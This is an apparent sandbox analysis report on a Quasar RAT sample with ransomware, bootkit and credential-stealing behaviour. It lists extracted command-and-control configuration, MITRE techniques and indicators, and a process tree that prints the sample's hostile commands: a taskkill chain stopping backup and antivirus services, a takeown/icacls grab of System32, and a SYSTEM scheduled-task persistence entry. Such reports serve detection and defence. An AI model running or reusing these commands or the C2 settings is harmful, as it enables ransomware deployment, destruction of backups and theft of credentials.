quasar | 65af8761b34d50026541f9607547c27fb40af28dabbe3f705fe69b551faf8496

Resubmissions

28-02-2024 09:17

240228-k84xnaga5v 10

15-01-2024 07:41

240115-jh96bachc6 10

23-10-2023 07:49

231023-jn2q5agh62 10

17-10-2023 15:34

231017-szv76ada4t 10

Analysis

max time kernel
174s
max time network
192s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
17-10-2023 15:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vcac.exe
Size

41.6MB
MD5

0fb2af6afdbdaf9206a5505264f0bf71
SHA1

2a6a04694b83ac2d4d0c207951fc838072804b6a
SHA256

65af8761b34d50026541f9607547c27fb40af28dabbe3f705fe69b551faf8496
SHA512

f5edebf5a9d4d0d4e5c11285febace0c65cf998573267da4016af563920de76f970b41661e2888de06cae737b56bc31a19c7f588993fc3e16828cb99c96ef7d7
SSDEEP

393216:Q/joxiIE7YoPQtsTTp7Lk3meBcGfd0vYM2krlFk1mX1eq44:Ijoe7rPQts/RLaT5F0vYvXFg

Score

10^/10

quasar user bootkit collection discovery evasion exploit persistence pyinstaller ransomware spyware stealer trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
1

Extracted

Family

quasar

Version

1.4.1

Botnet

user

192.168.0.13:3440

elpepemanca.ddns.net:3440

Mutex

5950a87d-00d0-4fc0-a953-61143318e6d1

Attributes

encryption_key
1A866C514D7B8C5F02AAA72B847C1F305295B74C
install_name
Windows.exe
log_directory
Logs
reconnect_delay
1
startup_key
Discord.exe
subdirectory
System

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 5 IoCs

resource	yara_rule
behavioral2/memory/5040-1-0x0000000000B60000-0x00000000034FA000-memory.dmp	family_quasar
behavioral2/files/0x0008000000023273-460.dat	family_quasar
behavioral2/files/0x0008000000023273-508.dat	family_quasar
behavioral2/files/0x0008000000023273-509.dat	family_quasar
behavioral2/memory/2332-518-0x00000000005A0000-0x00000000008C4000-memory.dmp	family_quasar

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	vcac.exe

Modifies Windows Firewall 1 TTPs 5 IoCs

evasion

Windows Service

T1543.003

pid	Process
752	netsh.exe
4880	netsh.exe
4680	netsh.exe
4596	netsh.exe
4640	netsh.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3208	takeown.exe
1896	icacls.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	vcac.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	server.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe	vcac.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe	vcac.exe

Executes dropped EXE 11 IoCs

pid	Process
448	lm.exe
1660	mbr.exe
4920	svchost.exe
3500	pass.exe
3304	steal.exe
2332	server.exe
4836	discord.exe
3080	LaZagne.exe
3748	steal.exe
4440	LaZagne.exe
4200	server.exe

Loads dropped DLL 64 IoCs

pid	Process
448	lm.exe
448	lm.exe
448	lm.exe
5040	vcac.exe
5040	vcac.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
4440	LaZagne.exe
3748	steal.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
3748	steal.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
3748	steal.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
4440	LaZagne.exe
3748	steal.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
3748	steal.exe
3748	steal.exe
3748	steal.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
3748	steal.exe
3748	steal.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
3748	steal.exe
4440	LaZagne.exe
4440	LaZagne.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3208	takeown.exe
1896	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	LaZagne.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\mbr.exe"	mbr.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1926387074-3400613176-3566796709-1000\desktop.ini	vcac.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
98	api.ipify.org
100	api.ipify.org
102	api.ipify.org
114	api.ipify.org

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	lm.exe
File opened for modification	\??\PhysicalDrive0	mbr.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\LogonUI.exe	svchost.exe

Detects Pyinstaller 7 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0008000000023272-451.dat	pyinstaller
behavioral2/files/0x0008000000023272-458.dat	pyinstaller
behavioral2/files/0x0008000000023272-464.dat	pyinstaller
behavioral2/files/0x00060000000232b0-574.dat	pyinstaller
behavioral2/files/0x00060000000232b0-575.dat	pyinstaller
behavioral2/files/0x0008000000023272-602.dat	pyinstaller
behavioral2/files/0x00060000000232b0-729.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1716	schtasks.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2420	tasklist.exe

Kills process with taskkill 42 IoCs

evasion

pid	Process
2980	taskkill.exe
3900	taskkill.exe
4304	taskkill.exe
1420	taskkill.exe
1896	taskkill.exe
4556	taskkill.exe
5036	taskkill.exe
2180	taskkill.exe
2152	taskkill.exe
3868	taskkill.exe
3020	taskkill.exe
3224	taskkill.exe
4856	taskkill.exe
4140	taskkill.exe
1488	taskkill.exe
4760	taskkill.exe
3016	taskkill.exe
1112	taskkill.exe
3452	taskkill.exe
4984	taskkill.exe
4116	taskkill.exe
1512	taskkill.exe
1992	taskkill.exe
5108	taskkill.exe
992	taskkill.exe
4976	taskkill.exe
3572	taskkill.exe
1904	taskkill.exe
1260	taskkill.exe
3168	taskkill.exe
3044	taskkill.exe
4820	taskkill.exe
4984	taskkill.exe
4492	taskkill.exe
2176	taskkill.exe
4120	taskkill.exe
1444	taskkill.exe
5108	taskkill.exe
4364	taskkill.exe
3628	taskkill.exe
4508	taskkill.exe
2748	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
3716	reg.exe
3728	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4016	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5092	powershell.exe
5092	powershell.exe
5092	powershell.exe
3500	pass.exe
3500	pass.exe
4836	discord.exe
4836	discord.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
4440	LaZagne.exe
5040	vcac.exe
5040	vcac.exe
4440	LaZagne.exe
4440	LaZagne.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe
5040	vcac.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5040	vcac.exe
Token: SeTakeOwnershipPrivilege	3208	takeown.exe
Token: SeIncreaseQuotaPrivilege	1840	WMIC.exe
Token: SeSecurityPrivilege	1840	WMIC.exe
Token: SeTakeOwnershipPrivilege	1840	WMIC.exe
Token: SeLoadDriverPrivilege	1840	WMIC.exe
Token: SeSystemProfilePrivilege	1840	WMIC.exe
Token: SeSystemtimePrivilege	1840	WMIC.exe
Token: SeProfSingleProcessPrivilege	1840	WMIC.exe
Token: SeIncBasePriorityPrivilege	1840	WMIC.exe
Token: SeCreatePagefilePrivilege	1840	WMIC.exe
Token: SeBackupPrivilege	1840	WMIC.exe
Token: SeRestorePrivilege	1840	WMIC.exe
Token: SeShutdownPrivilege	1840	WMIC.exe
Token: SeDebugPrivilege	1840	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1840	WMIC.exe
Token: SeRemoteShutdownPrivilege	1840	WMIC.exe
Token: SeUndockPrivilege	1840	WMIC.exe
Token: SeManageVolumePrivilege	1840	WMIC.exe
Token: 33	1840	WMIC.exe
Token: 34	1840	WMIC.exe
Token: 35	1840	WMIC.exe
Token: 36	1840	WMIC.exe
Token: SeDebugPrivilege	5108	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1840	WMIC.exe
Token: SeSecurityPrivilege	1840	WMIC.exe
Token: SeTakeOwnershipPrivilege	1840	WMIC.exe
Token: SeLoadDriverPrivilege	1840	WMIC.exe
Token: SeSystemProfilePrivilege	1840	WMIC.exe
Token: SeSystemtimePrivilege	1840	WMIC.exe
Token: SeProfSingleProcessPrivilege	1840	WMIC.exe
Token: SeIncBasePriorityPrivilege	1840	WMIC.exe
Token: SeCreatePagefilePrivilege	1840	WMIC.exe
Token: SeBackupPrivilege	1840	WMIC.exe
Token: SeRestorePrivilege	1840	WMIC.exe
Token: SeShutdownPrivilege	1840	WMIC.exe
Token: SeDebugPrivilege	1840	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1840	WMIC.exe
Token: SeRemoteShutdownPrivilege	1840	WMIC.exe
Token: SeUndockPrivilege	1840	WMIC.exe
Token: SeManageVolumePrivilege	1840	WMIC.exe
Token: 33	1840	WMIC.exe
Token: 34	1840	WMIC.exe
Token: 35	1840	WMIC.exe
Token: 36	1840	WMIC.exe
Token: SeDebugPrivilege	5036	taskkill.exe
Token: SeDebugPrivilege	1260	taskkill.exe
Token: SeBackupPrivilege	3224	taskkill.exe
Token: SeRestorePrivilege	3224	taskkill.exe
Token: SeAuditPrivilege	3224	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	4140	taskkill.exe
Token: SeDebugPrivilege	2980	taskkill.exe
Token: SeDebugPrivilege	2748	taskkill.exe
Token: SeDebugPrivilege	992	taskkill.exe
Token: SeDebugPrivilege	4492	taskkill.exe
Token: SeDebugPrivilege	4976	taskkill.exe
Token: SeDebugPrivilege	3168	taskkill.exe
Token: SeDebugPrivilege	3452	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe
Token: SeDebugPrivilege	2176	taskkill.exe
Token: SeDebugPrivilege	4984	taskkill.exe
Token: SeDebugPrivilege	4120	taskkill.exe
Token: SeDebugPrivilege	2180	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2332	server.exe
4200	server.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5040 wrote to memory of 3204	5040	vcac.exe	87
PID 5040 wrote to memory of 3204	5040	vcac.exe	87
PID 5040 wrote to memory of 3204	5040	vcac.exe	87
PID 5040 wrote to memory of 3316	5040	vcac.exe	89
PID 5040 wrote to memory of 3316	5040	vcac.exe	89
PID 5040 wrote to memory of 3316	5040	vcac.exe	89
PID 3316 wrote to memory of 448	3316	cmd.exe	92
PID 3316 wrote to memory of 448	3316	cmd.exe	92
PID 3316 wrote to memory of 448	3316	cmd.exe	92
PID 5040 wrote to memory of 1660	5040	vcac.exe	93
PID 5040 wrote to memory of 1660	5040	vcac.exe	93
PID 5040 wrote to memory of 1660	5040	vcac.exe	93
PID 5040 wrote to memory of 4920	5040	vcac.exe	94
PID 5040 wrote to memory of 4920	5040	vcac.exe	94
PID 1660 wrote to memory of 1716	1660	mbr.exe	95
PID 1660 wrote to memory of 1716	1660	mbr.exe	95
PID 1660 wrote to memory of 1716	1660	mbr.exe	95
PID 4920 wrote to memory of 2076	4920	svchost.exe	98
PID 4920 wrote to memory of 2076	4920	svchost.exe	98
PID 2076 wrote to memory of 3208	2076	cmd.exe	100
PID 2076 wrote to memory of 3208	2076	cmd.exe	100
PID 2076 wrote to memory of 1896	2076	cmd.exe	101
PID 2076 wrote to memory of 1896	2076	cmd.exe	101
PID 5040 wrote to memory of 1780	5040	vcac.exe	108
PID 5040 wrote to memory of 1780	5040	vcac.exe	108
PID 5040 wrote to memory of 1780	5040	vcac.exe	108
PID 5040 wrote to memory of 1264	5040	vcac.exe	110
PID 5040 wrote to memory of 1264	5040	vcac.exe	110
PID 5040 wrote to memory of 1264	5040	vcac.exe	110
PID 5040 wrote to memory of 4836	5040	vcac.exe	112
PID 5040 wrote to memory of 4836	5040	vcac.exe	112
PID 5040 wrote to memory of 4836	5040	vcac.exe	112
PID 1780 wrote to memory of 5108	1780	cmd.exe	114
PID 1780 wrote to memory of 5108	1780	cmd.exe	114
PID 1780 wrote to memory of 5108	1780	cmd.exe	114
PID 4836 wrote to memory of 1840	4836	cmd.exe	115
PID 4836 wrote to memory of 1840	4836	cmd.exe	115
PID 4836 wrote to memory of 1840	4836	cmd.exe	115
PID 1264 wrote to memory of 4640	1264	cmd.exe	116
PID 1264 wrote to memory of 4640	1264	cmd.exe	116
PID 1264 wrote to memory of 4640	1264	cmd.exe	116
PID 1780 wrote to memory of 5036	1780	cmd.exe	117
PID 1780 wrote to memory of 5036	1780	cmd.exe	117
PID 1780 wrote to memory of 5036	1780	cmd.exe	117
PID 1780 wrote to memory of 1260	1780	cmd.exe	119
PID 1780 wrote to memory of 1260	1780	cmd.exe	119
PID 1780 wrote to memory of 1260	1780	cmd.exe	119
PID 1780 wrote to memory of 2152	1780	cmd.exe	121
PID 1780 wrote to memory of 2152	1780	cmd.exe	121
PID 1780 wrote to memory of 2152	1780	cmd.exe	121
PID 1264 wrote to memory of 752	1264	cmd.exe	123
PID 1264 wrote to memory of 752	1264	cmd.exe	123
PID 1264 wrote to memory of 752	1264	cmd.exe	123
PID 1780 wrote to memory of 4140	1780	cmd.exe	124
PID 1780 wrote to memory of 4140	1780	cmd.exe	124
PID 1780 wrote to memory of 4140	1780	cmd.exe	124
PID 1780 wrote to memory of 2980	1780	cmd.exe	125
PID 1780 wrote to memory of 2980	1780	cmd.exe	125
PID 1780 wrote to memory of 2980	1780	cmd.exe	125
PID 1780 wrote to memory of 2748	1780	cmd.exe	126
PID 1780 wrote to memory of 2748	1780	cmd.exe	126
PID 1780 wrote to memory of 2748	1780	cmd.exe	126
PID 1264 wrote to memory of 4880	1264	cmd.exe	127
PID 1264 wrote to memory of 4880	1264	cmd.exe	127

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	LaZagne.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	LaZagne.exe

C:\Users\Admin\AppData\Local\Temp\vcac.exe
"C:\Users\Admin\AppData\Local\Temp\vcac.exe"
1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5040
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat
  2⤵
  PID:3204
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3316
- - C:\Users\Admin\AppData\Roaming\lm.exe
    lm.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Writes to the Master Boot Record (MBR)
    PID:448
- C:\Users\Admin\AppData\Roaming\mbr.exe
  "C:\Users\Admin\AppData\Roaming\mbr.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of WriteProcessMemory
  PID:1660
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"
    3⤵
    - Creates scheduled task(s)
    PID:1716
- C:\Users\Admin\AppData\Roaming\svchost.exe
  "C:\Users\Admin\AppData\Roaming\svchost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:4920
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2076
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:3208
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32 /grant "Admin:F"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1896
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentBrowser*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecDiveciMediaService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5036
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecJobEngine*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1260
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecManagementService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM vss*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4140
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM svc$*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM memtas*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4492
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM backup*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3168
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxVss*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3452
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxBlr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxFWD*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2176
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCVD*
    3⤵
    - Kills process with taskkill
    PID:4984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCIMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4120
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM DefWatch*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2180
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM ccEvtMgr*
    3⤵
    - Kills process with taskkill
    PID:3900
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM SavRoam*
    3⤵
    - Kills process with taskkill
    PID:1444
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM RTVscan*
    3⤵
    - Kills process with taskkill
    PID:3020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBFCService*
    3⤵
    - Kills process with taskkill
    PID:4116
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:5108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooBackup*
    3⤵
    - Kills process with taskkill
    PID:4364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooIT*
    3⤵
    - Kills process with taskkill
    PID:4304
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    PID:3628
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    PID:1112
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM stc_raw_agent*
    3⤵
    - Kills process with taskkill
    PID:1488
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VSNAPVSS*
    3⤵
    - Kills process with taskkill
    PID:1512
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBCFMonitorService*
    3⤵
    - Kills process with taskkill
    PID:1420
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamTransportSvc*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3224
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamDeploymentService*
    3⤵
    - Kills process with taskkill
    PID:4856
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamNFSSvc*
    3⤵
    - Kills process with taskkill
    PID:1992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    PID:4760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM PDVFSService*
    3⤵
    - Kills process with taskkill
    PID:3572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecVSSProvider*
    3⤵
    - Kills process with taskkill
    PID:3044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentAccelerator*
    3⤵
    - Kills process with taskkill
    PID:4820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecRPCService*
    3⤵
    - Kills process with taskkill
    PID:1904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcrSch2Svc*
    3⤵
    - Kills process with taskkill
    PID:1896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcronisAgent*
    3⤵
    - Kills process with taskkill
    PID:4556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CASAD2DWebSvc*
    3⤵
    - Kills process with taskkill
    PID:4508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CAARCUpdateSvc*
    3⤵
    - Kills process with taskkill
    PID:3016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM TeamViewer*
    3⤵
    - Kills process with taskkill
